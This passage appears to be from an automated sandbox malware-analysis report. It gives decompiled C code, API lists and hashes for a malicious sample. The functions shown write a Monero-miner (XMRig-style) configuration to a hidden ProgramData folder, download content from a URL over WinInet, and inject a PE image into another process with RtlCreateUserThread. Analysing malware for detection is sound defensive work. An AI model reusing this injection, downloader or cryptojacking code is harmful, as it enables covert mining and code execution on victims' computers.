						E004016E0( &_v2156, "\r\n\t\t\t\"rig-id\": null,");
						_t282 =  &_v2156;
						if(_a20 == 0) {
							_push("\r\n\t\t\t\"nicehash\": false,");
						} else {
							_push("\r\n\t\t\t\"nicehash\": true,");
						}
						_push(_t282);
						E004016E0();
						_t284 =  &_v2156;
						if( *0x5d1c24 == 0) {
							_push("\r\n\t\t\t\"keepalive\": false,");
						} else {
							_push("\r\n\t\t\t\"keepalive\": true,");
						}
						E004016E0();
						E004016E0( &_v2156, "\r\n\t\t\t\"enabled\": true,");
						E004016E0( &_v2156, "\r\n\t\t\t\"tls\": false,");
						E004016E0( &_v2156, "\r\n\t\t\t\"tls-fingerprint\": null,");
						E004016E0( &_v2156, "\r\n\t\t\t\"daemon\": false,");
						E004016E0( &_v2156, "\r\n\t\t\t\"self-select\": null");
						E004016E0( &_v2156, "\r\n\t\t}");
						E004016E0( &_v2156, "\r\n\t],");
						E004016E0( &_v2156, "\r\n\t\"print-time\": 60,");
						E004016E0( &_v2156, "\r\n\t\"health-print-time\": 60,");
						E004016E0( &_v2156, "\r\n\t\"retries\": 5,");
						E004016E0( &_v2156, "\r\n\t\"retry-pause\": 5,");
						E004016E0( &_v2156, "\r\n\t\"syslog\": false,");
						E004016E0( &_v2156, "\r\n\t\"user-agent\": null,");
						E004016E0( &_v2156, "\r\n\t\"watch\": false");
						E004016E0( &_v2156, "\r\n}");
						_t321 = E004088D0(_t331,  &_v2156, E00401850( &_v2156) + 1,  &_v24);
						_t323 =  *0x5d10c0(_a4, 0, 0, 0,  &_v32, _t321, _v24,  &_v72, 0, _t284); // executed
						_push(_a4);
						if(_t323 == 0) {
							NtClose(); // executed
							_push(_v16);
							E00403720(_t334, _t336, _v20); // executed
							return 1;
						} else {
							NtClose();
							goto L29;
						}
					}
				}
			}

































                                                                                                        0x00403ca0
                                                                                                        0x00403ca0
                                                                                                        0x00403ca3
                                                                                                        0x00403caf
                                                                                                        0x00403cb4
                                                                                                        0x00403cb6
                                                                                                        0x00403cb6
                                                                                                        0x00403cbd
                                                                                                        0x00403cc5
                                                                                                        0x00403cc5
                                                                                                        0x00403cd7
                                                                                                        0x00403cdf
                                                                                                        0x00403ce7
                                                                                                        0x00403cf0
                                                                                                        0x00403ce9
                                                                                                        0x00403ce9
                                                                                                        0x00403ce9
                                                                                                        0x00403cf5
                                                                                                        0x00403cf6
                                                                                                        0x00403d0c
                                                                                                        0x00403d14
                                                                                                        0x00403d1e
                                                                                                        0x00403d25
                                                                                                        0x00403d28
                                                                                                        0x00403d2f
                                                                                                        0x00403d34
                                                                                                        0x00403d3b
                                                                                                        0x00403d42
                                                                                                        0x00403d49
                                                                                                        0x00403d50
                                                                                                        0x00403d57
                                                                                                        0x00403d5e
                                                                                                        0x00403d66
                                                                                                        0x00403d9c
                                                                                                        0x00403d9f
                                                                                                        0x00000000
                                                                                                        0x00403da1
                                                                                                        0x00403da4
                                                                                                        0x00000000
                                                                                                        0x00403da6
                                                                                                        0x00403da6
                                                                                                        0x00403da6
                                                                                                        0x00403da4
                                                                                                        0x00000000
                                                                                                        0x00403d68
                                                                                                        0x00403d6f
                                                                                                        0x00403d8e
                                                                                                        0x00403d71
                                                                                                        0x00403d71
                                                                                                        0x00403d74
                                                                                                        0x00403d74
                                                                                                        0x00403d77
                                                                                                        0x00403d7c
                                                                                                        0x00403dad
                                                                                                        0x00403db7
                                                                                                        0x00403d7e
                                                                                                        0x00403d7e
                                                                                                        0x00403d7e
                                                                                                        0x00403dba
                                                                                                        0x00403dba
                                                                                                        0x00403dbf
                                                                                                        0x00403dbf
                                                                                                        0x00403d6f
                                                                                                        0x00403dca
                                                                                                        0x00403dcd
                                                                                                        0x00403dd2
                                                                                                        0x00403dd4
                                                                                                        0x00403dd6
                                                                                                        0x00403ddd
                                                                                                        0x00403de6
                                                                                                        0x00404444
                                                                                                        0x0040444a
                                                                                                        0x00403dec
                                                                                                        0x00403dfe
                                                                                                        0x00403e05
                                                                                                        0x00403e0f
                                                                                                        0x00403e1a
                                                                                                        0x00403e2a
                                                                                                        0x00403e32
                                                                                                        0x00403e39
                                                                                                        0x00403e41
                                                                                                        0x00000000
                                                                                                        0x00403e47
                                                                                                        0x00403e53
                                                                                                        0x00403e64
                                                                                                        0x00403e75
                                                                                                        0x00403e86
                                                                                                        0x00403e97
                                                                                                        0x00403ea8
                                                                                                        0x00403eb9
                                                                                                        0x00403eca
                                                                                                        0x00403ede
                                                                                                        0x00403eef
                                                                                                        0x00403f00
                                                                                                        0x00403f11
                                                                                                        0x00403f22
                                                                                                        0x00403f33
                                                                                                        0x00403f44
                                                                                                        0x00403f55
                                                                                                        0x00403f69
                                                                                                        0x00403f7a
                                                                                                        0x00403f8b
                                                                                                        0x00403f9c
                                                                                                        0x00403fad
                                                                                                        0x00403fbe
                                                                                                        0x00403fcf
                                                                                                        0x00403fe0
                                                                                                        0x00403ff4
                                                                                                        0x00404004
                                                                                                        0x00404015
                                                                                                        0x00404026
                                                                                                        0x00404037
                                                                                                        0x00404048
                                                                                                        0x00404059
                                                                                                        0x0040406a
                                                                                                        0x0040407e
                                                                                                        0x0040408f
                                                                                                        0x004040a0
                                                                                                        0x004040b1
                                                                                                        0x004040c2
                                                                                                        0x004040d3
                                                                                                        0x004040e4
                                                                                                        0x004040f5
                                                                                                        0x00404109
                                                                                                        0x0040411a
                                                                                                        0x0040412b
                                                                                                        0x0040413c
                                                                                                        0x0040414d
                                                                                                        0x0040415e
                                                                                                        0x0040416f
                                                                                                        0x00404180
                                                                                                        0x00404194
                                                                                                        0x004041a5
                                                                                                        0x004041b6
                                                                                                        0x004041c7
                                                                                                        0x004041d8
                                                                                                        0x004041e9
                                                                                                        0x004041fa
                                                                                                        0x0040420b
                                                                                                        0x0040421d
                                                                                                        0x0040422e
                                                                                                        0x0040423f
                                                                                                        0x0040424e
                                                                                                        0x0040425f
                                                                                                        0x00404270
                                                                                                        0x0040427f
                                                                                                        0x00404290
                                                                                                        0x004042a4
                                                                                                        0x004042ac
                                                                                                        0x004042b6
                                                                                                        0x004042bf
                                                                                                        0x004042b8
                                                                                                        0x004042b8
                                                                                                        0x004042b8
                                                                                                        0x004042c4
                                                                                                        0x004042c5
                                                                                                        0x004042cd
                                                                                                        0x004042da
                                                                                                        0x004042e3
                                                                                                        0x004042dc
                                                                                                        0x004042dc
                                                                                                        0x004042dc
                                                                                                        0x004042e9
                                                                                                        0x004042fd
                                                                                                        0x0040430e
                                                                                                        0x0040431f
                                                                                                        0x00404330
                                                                                                        0x00404341
                                                                                                        0x00404352
                                                                                                        0x00404363
                                                                                                        0x00404374
                                                                                                        0x00404388
                                                                                                        0x00404399
                                                                                                        0x004043aa
                                                                                                        0x004043bb
                                                                                                        0x004043cc
                                                                                                        0x004043dd
                                                                                                        0x004043ee
                                                                                                        0x00404412
                                                                                                        0x00404431
                                                                                                        0x00404437
                                                                                                        0x0040443c
                                                                                                        0x0040444b
                                                                                                        0x00404451
                                                                                                        0x00404458
                                                                                                        0x00404469
                                                                                                        0x0040443e
                                                                                                        0x0040443e
                                                                                                        0x00000000
                                                                                                        0x0040443e
                                                                                                        0x0040443c
                                                                                                        0x00403e41

                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(00000324), ref: 00403CC5
                                                                                                        • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00000000), ref: 00403D5E
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(?,00000001,00000000,00000000), ref: 00403DDE
                                                                                                        • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403E39
                                                                                                        • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00404821,00000000,00000000), ref: 00404431
                                                                                                        • NtClose.NTDLL(00000000), ref: 0040443E
                                                                                                        • NtClose.NTDLL(00000000), ref: 0040444B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close$FilePath$CreateInfoNameName_SystemWrite
                                                                                                        • String ID: "algo": null,$"coin": "monero",$"daemon": false,$"enabled": true,$"keepalive": false,$"keepalive": true,$"nicehash": false,$"nicehash": true,$"pass": "$"rig-id": null,$"self-select": null$"threads": $"tls": false,$"tls-fingerprint": null,$"url": "$"user": "$"argon2-impl": null,$"argon2/chukwa": "cpu-profile",$"argon2/wrkz": "cpu-profile",$"asm": true,$"cn": "cpu-profile",$"cn-gpu": "cpu-profile",$"cn-heavy/0": "cpu-profile",$"cn-heavy/tube": "cpu-profile",$"cn-heavy/xhv": "cpu-profile",$"cn-lite/0": "cpu-profile",$"cn-lite/1": "cpu-profile",$"cn/2": "cpu-profile",$"cn/fast": "cpu-profile",$"cn/half": "cpu-profile",$"cn/r": "cpu-profile",$"cpu-profile": {$"enabled": false$"enabled": true,$"huge-pages": true,$"hw-aes": null,$"id": null,$"init": 1,$"memory-pool": false,$"numa": true$"priority": null,$"rx": "cpu-profile",$"rx/0": "cpu-profile",$"rx/arq": "cpu-profile"$"rx/loki": "cpu-profile",$"rx/wow": "cpu-profile",$"worker-id": null${$}$},$"autosave": false,$"background": false,$"colors": true,$"cpu": {$"donate-level": $"donate-over-proxy": 0,$"health-print-time": 60,$"http": {$"log-file": null,$"pools": [$"print-time": 60,$"randomx": {$"retries": 5,$"retry-pause": 5,$"syslog": false,$"user-agent": null,$"version": 1,$"watch": false$],$},$},$},$},$}$@$C:\ProgramData\LKBNMTFJgl$\cfg$\cfgi${"api": {
                                                                                                        • API String ID: 3784785972-1821464420
                                                                                                        • Opcode ID: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
                                                                                                        • Instruction ID: 0c6b8c97c8f286fc2f2609601cf0158cca0e688ef71c127dda3ca6300913d252
                                                                                                        • Opcode Fuzzy Hash: 2299174eb71a117bdd1055cccbc8d6c97a541872e55d8ae9f2dc8b03f3bcfe8c
                                                                                                        • Instruction Fuzzy Hash: DE020771E5021CA6CB50EEE18C86FCE73ECAB04744F554677B148B21D2DEBEDA848B58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404B00, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 266networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E00404B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
				void* _v8;
				void _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t54;
				int _t55;
				void* _t61;
				void* _t62;
				void* _t66;
				void* _t71;
				int _t78;
				long _t87;
				char* _t91;
				long _t108;
				void* _t111;
				char* _t118;
				long _t119;
				char* _t123;
				void* _t126;
				void* _t128;
				void* _t134;
				void* _t136;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t140;

				E00401BB0( &_v108, 0, 0x38);
				_t118 = _a4;
				_v24 = 0;
				_t108 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t54 = E00401850(_t118);
				_t136 = _t134 + 0x10;
				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112); // executed
				if(_t55 != 0) {
					_t123 = E004015E0(_v92 + 1);
					E00401BB0(_t123, 0, _v92 + 1);
					E00401640(_t123, _v96, _v92);
					_t137 = _t136 + 0x1c;
					_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0); // executed
					_v8 = _t61;
					if(_t61 != 0) {
						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0); // executed
						_v20 = _t62;
						_push(_t123);
						if(_t62 != 0) {
							E00401510();
							E004018D0(_t118, "https://");
							_t138 = _t137 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t125 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t66 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0); // executed
							_t126 = _t66;
							_v16 = _t126;
							if(_t126 == 0) {
								L26:
								InternetCloseHandle(_v20);
								InternetCloseHandle(_v8);
								return 0;
							} else {
								_t71 = E004018D0(_t118, "https://");
								_t139 = _t138 + 8;
								if(_t71 == 0) {
									L10:
									if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
										goto L25;
									} else {
										_t119 = 0x400;
										_t128 = E004015E0(0x400);
										_t140 = _t139 + 4;
										if(_t128 == 0) {
											_t126 = _v16;
											goto L25;
										} else {
											do {
												_t78 = InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24); // executed
												if(_t78 == 0) {
													if(GetLastError() != 0x7a) {
														E00401510(_t128);
														L23:
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														InternetCloseHandle(_v8);
														return 0;
													} else {
														_t119 = _t119 + 0x400;
														goto L17;
													}
												} else {
													_t87 = _v24;
													if(_t87 == 0) {
														InternetCloseHandle(_v16); // executed
														InternetCloseHandle(_v20);
														_t111 = _v8;
														InternetCloseHandle(_t111);
														_t91 = E004018D0(_t128, ";End");
														if(_t91 != 0) {
															 *_t91 = 0;
															return _t128;
														} else {
															E00401510(_t128);
															InternetCloseHandle(_v16);
															InternetCloseHandle(_v20);
															InternetCloseHandle(_t111);
															return 0;
														}
													} else {
														_t108 = _t108 + _t87;
														goto L17;
													}
												}
												goto L27;
												L17:
												_t128 = E004016A0(_t128, _t119 + _t108);
												_t140 = _t140 + 8;
											} while (_t128 != 0);
											goto L23;
										}
									}
								} else {
									_v12 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) {
										L25:
										InternetCloseHandle(_t126);
										goto L26;
									} else {
										_v12 = _v12 | 0x00000180;
										if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
											goto L25;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E00401510();
							InternetCloseHandle(_v8);
							return 0;
						}
					} else {
						E00401510(_t123);
						return 0;
					}
				} else {
					return _t55;
				}
				L27:
			}














































                                                                                                        0x00404b10
                                                                                                        0x00404b15
                                                                                                        0x00404b1e
                                                                                                        0x00404b25
                                                                                                        0x00404b27
                                                                                                        0x00404b2e
                                                                                                        0x00404b35
                                                                                                        0x00404b3f
                                                                                                        0x00404b46
                                                                                                        0x00404b4d
                                                                                                        0x00404b52
                                                                                                        0x00404b57
                                                                                                        0x00404b5f
                                                                                                        0x00404b75
                                                                                                        0x00404b7c
                                                                                                        0x00404b88
                                                                                                        0x00404b8d
                                                                                                        0x00404b9d
                                                                                                        0x00404ba3
                                                                                                        0x00404ba8
                                                                                                        0x00404bcb
                                                                                                        0x00404bd1
                                                                                                        0x00404bd4
                                                                                                        0x00404bd7
                                                                                                        0x00404bf4
                                                                                                        0x00404c04
                                                                                                        0x00404c09
                                                                                                        0x00404c0c
                                                                                                        0x00404c15
                                                                                                        0x00404c21
                                                                                                        0x00404c28
                                                                                                        0x00404c2b
                                                                                                        0x00404c38
                                                                                                        0x00404c47
                                                                                                        0x00404c52
                                                                                                        0x00404c58
                                                                                                        0x00404c5a
                                                                                                        0x00404c5f
                                                                                                        0x00404db8
                                                                                                        0x00404dbb
                                                                                                        0x00404dca
                                                                                                        0x00404dd4
                                                                                                        0x00404c65
                                                                                                        0x00404c6b
                                                                                                        0x00404c70
                                                                                                        0x00404c75
                                                                                                        0x00404cb8
                                                                                                        0x00404cc9
                                                                                                        0x00000000
                                                                                                        0x00404ccf
                                                                                                        0x00404ccf
                                                                                                        0x00404cda
                                                                                                        0x00404cdc
                                                                                                        0x00404ce1
                                                                                                        0x00404dad
                                                                                                        0x00000000
                                                                                                        0x00404ce7
                                                                                                        0x00404ce7
                                                                                                        0x00404cf3
                                                                                                        0x00404cfb
                                                                                                        0x00404d11
                                                                                                        0x00404d86
                                                                                                        0x00404d8e
                                                                                                        0x00404d9a
                                                                                                        0x00404d9f
                                                                                                        0x00404da2
                                                                                                        0x00404dac
                                                                                                        0x00404d13
                                                                                                        0x00404d13
                                                                                                        0x00000000
                                                                                                        0x00404d13
                                                                                                        0x00404cfd
                                                                                                        0x00404cfd
                                                                                                        0x00404d02
                                                                                                        0x00404d31
                                                                                                        0x00404d40
                                                                                                        0x00404d42
                                                                                                        0x00404d46
                                                                                                        0x00404d4e
                                                                                                        0x00404d58
                                                                                                        0x00404d79
                                                                                                        0x00404d84
                                                                                                        0x00404d5a
                                                                                                        0x00404d5b
                                                                                                        0x00404d66
                                                                                                        0x00404d6b
                                                                                                        0x00404d6e
                                                                                                        0x00404d78
                                                                                                        0x00404d78
                                                                                                        0x00404d04
                                                                                                        0x00404d04
                                                                                                        0x00000000
                                                                                                        0x00404d04
                                                                                                        0x00404d02
                                                                                                        0x00000000
                                                                                                        0x00404d19
                                                                                                        0x00404d23
                                                                                                        0x00404d25
                                                                                                        0x00404d28
                                                                                                        0x00000000
                                                                                                        0x00404d2c
                                                                                                        0x00404ce1
                                                                                                        0x00404c77
                                                                                                        0x00404c7a
                                                                                                        0x00404c81
                                                                                                        0x00404c94
                                                                                                        0x00404db0
                                                                                                        0x00404db6
                                                                                                        0x00000000
                                                                                                        0x00404c9a
                                                                                                        0x00404c9a
                                                                                                        0x00404cb2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404cb2
                                                                                                        0x00404c94
                                                                                                        0x00404c75
                                                                                                        0x00404bd9
                                                                                                        0x00404bd9
                                                                                                        0x00404be5
                                                                                                        0x00404bf3
                                                                                                        0x00404bf3
                                                                                                        0x00404baa
                                                                                                        0x00404bab
                                                                                                        0x00404bbb
                                                                                                        0x00404bbb
                                                                                                        0x00404b66
                                                                                                        0x00404b66
                                                                                                        0x00404b66
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • InternetCrackUrlA.WININET(7519EA30,00000000,?), ref: 00404B57
                                                                                                        • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CrackOpen
                                                                                                        • String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                        • API String ID: 1262293563-2187584305
                                                                                                        • Opcode ID: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
                                                                                                        • Instruction ID: b075b86cb3f3238e1b45add10c95dfbc6438ce08dd21614d055a406b181498c9
                                                                                                        • Opcode Fuzzy Hash: 23e4e6220e37005b9647c86211bdfdd0f6ddd9ca7a57cee8a5006670cd84cd84
                                                                                                        • Instruction Fuzzy Hash: D381B971E002097BEB11ABA1EC45FAF77B8EF84754F100176FA04F62D1D7799D108AA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004029E0, Relevance: 37.8, APIs: 25, Instructions: 322nativememorythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 80%
                                                                                                        			E004029E0(void* __ecx, void* _a4, intOrPtr _a8, void* _a12, long _a16, DWORD* _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				long _v28;
				CHAR* _v32;
				struct HINSTANCE__* _v36;
				long* _v40;
				long _v44;
				void* _v48;
				long _v52;
				void* _v56;
				long _v60;
				long _v64;
				long _v68;
				long _v72;
				long _v76;
				void* _v80;
				long* _t104;
				long _t111;
				void* _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				CHAR* _t128;
				signed short _t131;
				CHAR* _t133;
				_Unknown_base(*)()* _t134;
				long* _t135;
				intOrPtr _t136;
				CHAR* _t137;
				long* _t140;
				CHAR* _t141;
				CHAR* _t146;
				long _t148;
				CHAR* _t149;
				CHAR* _t160;
				long _t163;
				CHAR** _t164;
				void* _t167;
				void* _t169;
				void* _t172;
				struct HINSTANCE__* _t175;
				void* _t176;
				signed int _t177;
				CHAR* _t179;
				signed int _t184;
				CHAR* _t187;
				_Unknown_base(*)()** _t189;
				void* _t191;
				CHAR* _t192;
				CHAR* _t194;
				long* _t195;
				void* _t197;
				signed short* _t198;
				CHAR** _t200;
				long _t201;
				void* _t203;
				void* _t204;

				_t172 = __ecx;
				_t104 = _a20;
				_t185 = _a4;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = 0;
				_v20 = 0;
				_v48 = 0;
				_v44 = 0;
				 *_t104 = 0;
				RtlImageNtHeader(_a4);
				_t195 = _t104;
				_v40 = _t195;
				if( *_t195 != 0x4550) {
					L5:
					return 0;
				} else {
					_v28 = _t195[0x14];
					_v56 = _a8;
					_v80 = 0x18;
					_v76 = 0;
					_v68 = 0;
					_v72 = 0;
					_v64 = 0;
					_v60 = 0;
					_v52 = 0;
					_t111 = NtOpenProcess( &_v8, 0x1fffff,  &_v80,  &_v56);
					if(_t111 != 0) {
						goto L5;
					} else {
						if( *0x5d1314 == _t111) {
							L6:
							_t114 = NtAllocateVirtualMemory(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40); // executed
							__eflags = _t114;
							if(_t114 != 0) {
								goto L4;
							} else {
								_t116 = VirtualAlloc(_t114, _v28, 0x3000, 0x40); // executed
								_t169 = _t116;
								__eflags = _t169;
								if(_t169 == 0) {
									L43:
									__eflags = _v12;
									if(_v12 != 0) {
										 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
									}
									_t117 = _v8;
									__eflags = _t117;
									if(_t117 != 0) {
										NtClose(_t117);
										_t117 = _v8;
									}
									__eflags = _t169;
									if(_t169 != 0) {
										VirtualFree(_t169, 0, 0x8000);
										_t117 = _v8;
									}
									__eflags = _v24;
									_v20 = 0;
									if(_v24 != 0) {
										 *0x5d10ac(_t117,  &_v24,  &_v20, 0x8000);
									}
									_t118 = _v16;
									__eflags = _t118;
									if(_t118 != 0) {
										NtClose(_t118);
									}
									__eflags = 0;
									return 0;
								} else {
									E00401640(_t169, _t185, _v28);
									_t204 = _t203 + 0xc;
									_t187 = _t169 + _t195[0x20];
									__eflags = _t187;
									while(1) {
										_t128 = _t187[0xc];
										_v32 = _t187;
										__eflags = _t128;
										if(_t128 != 0) {
											goto L11;
										}
										__eflags = _t187[4] - _t128;
										if(_t187[4] == _t128) {
											_t135 = _v40;
											_t176 = _v12;
											_t191 = _a4;
											_t45 = _t135 + 0xa0; // 0x45dd842a
											_t46 = _t135 + 0x34; // 0x0
											_t136 =  *_t46;
											_t200 =  *_t45 + _t169;
											_v40 = _t176 - _t136;
											__eflags =  *_t200;
											_v36 = _t191 - _t136;
											if( *_t200 != 0) {
												do {
													_t192 = _t200[1];
													_t50 =  &(_t200[1]); // 0x45dd842e
													_t164 = _t50;
													_v32 = _t164;
													__eflags = _t192 - 8;
													if(_t192 >= 8) {
														_t184 = 0;
														_t194 =  &(_t192[0xfffffffffffffff8]) >> 1;
														__eflags = _t194;
														if(_t194 != 0) {
															asm("o16 nop [eax+eax]");
															do {
																_t177 =  *(_t200 + 8 + _t184 * 2) & 0x0000ffff;
																__eflags = _t177;
																if(_t177 != 0) {
																	_t179 =  &(( *_t200)[_t177 & 0x00000fff]);
																	_t57 =  &(_t179[_t169]);
																	 *_t57 = _t179[_t169] + _v40 - _v36;
																	__eflags =  *_t57;
																}
																_t184 = _t184 + 1;
																__eflags = _t184 - _t194;
															} while (_t184 < _t194);
															_t164 = _v32;
														}
													}
													_t200 = _t200 +  *_t164;
													__eflags =  *_t200;
												} while ( *_t200 != 0);
												_t176 = _v12;
												_t191 = _a4;
											}
											_t137 = NtWriteVirtualMemory(_v8, _t176, _t169, _v28, 0); // executed
											__eflags = _t137;
											if(_t137 < 0) {
												goto L43;
											} else {
												_t201 = _a16;
												_t140 = NtAllocateVirtualMemory(_v8,  &_v24, 0,  &_a16, 0x3000, 4); // executed
												__eflags = _t140;
												if(_t140 != 0) {
													goto L43;
												} else {
													_t141 = NtWriteVirtualMemory(_v8, _v24, _a12, _t201, _t140); // executed
													__eflags = _t141;
													if(_t141 < 0) {
														goto L43;
													} else {
														_t146 = RtlCreateUserThread(_v8, 0, 0, 0, 0, 0, _v12 - _t191 + _a24, _v24,  &_v16, 0); // executed
														__eflags = _t146;
														if(_t146 < 0) {
															goto L43;
														} else {
															asm("xorps xmm0, xmm0");
															asm("movlpd [ebp-0x2c], xmm0");
															_t148 = NtWaitForSingleObject(_v16, 0,  &_v48);
															__eflags = _t148 - 0x102;
															if(_t148 == 0x102) {
																while(1) {
																	_t160 =  *0x5d2118; // 0x0
																	__eflags = _t160;
																	if(_t160 != 0) {
																		break;
																	}
																	Sleep(0xbb8); // executed
																	_t163 = NtWaitForSingleObject(_v16, 0,  &_v48);
																	__eflags = _t163 - 0x102;
																	if(_t163 == 0x102) {
																		continue;
																	} else {
																	}
																	goto L41;
																}
																TerminateThread(_v16, 0);
															}
															L41:
															_t149 = GetExitCodeThread(_v16, _a20);
															__eflags = _t149;
															if(_t149 == 0) {
																goto L43;
															} else {
																NtClose(_v16);
																 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
																NtClose(_v8);
																VirtualFree(_t169, 0, 0x8000);
																_v20 = 0;
																 *0x5d10ac(_v8,  &_v24,  &_v20, 0x8000);
																return 1;
															}
														}
													}
												}
											}
										} else {
											goto L11;
										}
										goto L54;
										L11:
										_t175 = E00408B00( &(_t128[_t169]));
										_t204 = _t204 + 4;
										_v36 = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L43;
										} else {
											_t197 = _t169 +  *_t187;
											_t189 = _t169 + _t187[0x10];
											__eflags = _t197 - _t169;
											_t198 =  ==  ? _t189 : _t197;
											__eflags = _t198 - _t169;
											if(_t198 == _t169) {
												goto L43;
											} else {
												_t131 =  *_t198;
												__eflags = _t131;
												if(__eflags == 0) {
													L19:
													_t187 =  &(_v32[0x14]);
													continue;
												} else {
													L14:
													L14:
													if(__eflags >= 0) {
														_t133 = _t131 + 2 + _t169;
														__eflags = _t133;
													} else {
														_t133 = _t131 & 0x0000ffff;
													}
													_t134 = GetProcAddress(_t175, _t133);
													 *_t189 = _t134;
													__eflags = _t134;
													if(_t134 == 0) {
														goto L43;
													}
													_t131 = _t198[2];
													_t198 =  &(_t198[2]);
													_t175 = _v36;
													_t189 = _t189 + 4;
													__eflags = _t131;
													if(__eflags != 0) {
														goto L14;
													} else {
														goto L19;
													}
												}
											}
										}
										goto L54;
									}
								}
							}
						} else {
							_t167 = E00408270(_t172, _v8);
							_t203 = _t203 + 4;
							if(_t167 != 0) {
								goto L6;
							} else {
								L4:
								NtClose(_v8);
								goto L5;
							}
						}
					}
				}
				L54:
			}































































                                                                                                        0x004029e0
                                                                                                        0x004029e6
                                                                                                        0x004029eb
                                                                                                        0x004029ef
                                                                                                        0x004029f6
                                                                                                        0x004029fd
                                                                                                        0x00402a04
                                                                                                        0x00402a0b
                                                                                                        0x00402a12
                                                                                                        0x00402a19
                                                                                                        0x00402a20
                                                                                                        0x00402a27
                                                                                                        0x00402a2d
                                                                                                        0x00402a33
                                                                                                        0x00402a35
                                                                                                        0x00402a3e
                                                                                                        0x00402ab9
                                                                                                        0x00402abf
                                                                                                        0x00402a40
                                                                                                        0x00402a43
                                                                                                        0x00402a49
                                                                                                        0x00402a53
                                                                                                        0x00402a63
                                                                                                        0x00402a6b
                                                                                                        0x00402a72
                                                                                                        0x00402a79
                                                                                                        0x00402a80
                                                                                                        0x00402a87
                                                                                                        0x00402a8e
                                                                                                        0x00402a96
                                                                                                        0x00000000
                                                                                                        0x00402a98
                                                                                                        0x00402a9e
                                                                                                        0x00402ac0
                                                                                                        0x00402ad4
                                                                                                        0x00402ada
                                                                                                        0x00402adc
                                                                                                        0x00000000
                                                                                                        0x00402ade
                                                                                                        0x00402aea
                                                                                                        0x00402af0
                                                                                                        0x00402af2
                                                                                                        0x00402af4
                                                                                                        0x00402d49
                                                                                                        0x00402d49
                                                                                                        0x00402d4d
                                                                                                        0x00402d5f
                                                                                                        0x00402d5f
                                                                                                        0x00402d65
                                                                                                        0x00402d68
                                                                                                        0x00402d6a
                                                                                                        0x00402d6d
                                                                                                        0x00402d73
                                                                                                        0x00402d73
                                                                                                        0x00402d76
                                                                                                        0x00402d78
                                                                                                        0x00402d82
                                                                                                        0x00402d88
                                                                                                        0x00402d88
                                                                                                        0x00402d8b
                                                                                                        0x00402d8f
                                                                                                        0x00402d96
                                                                                                        0x00402da6
                                                                                                        0x00402da6
                                                                                                        0x00402dac
                                                                                                        0x00402daf
                                                                                                        0x00402db1
                                                                                                        0x00402db4
                                                                                                        0x00402db4
                                                                                                        0x00402dbc
                                                                                                        0x00402dc2
                                                                                                        0x00402afa
                                                                                                        0x00402aff
                                                                                                        0x00402b0a
                                                                                                        0x00402b0d
                                                                                                        0x00402b0d
                                                                                                        0x00402b0f
                                                                                                        0x00402b0f
                                                                                                        0x00402b12
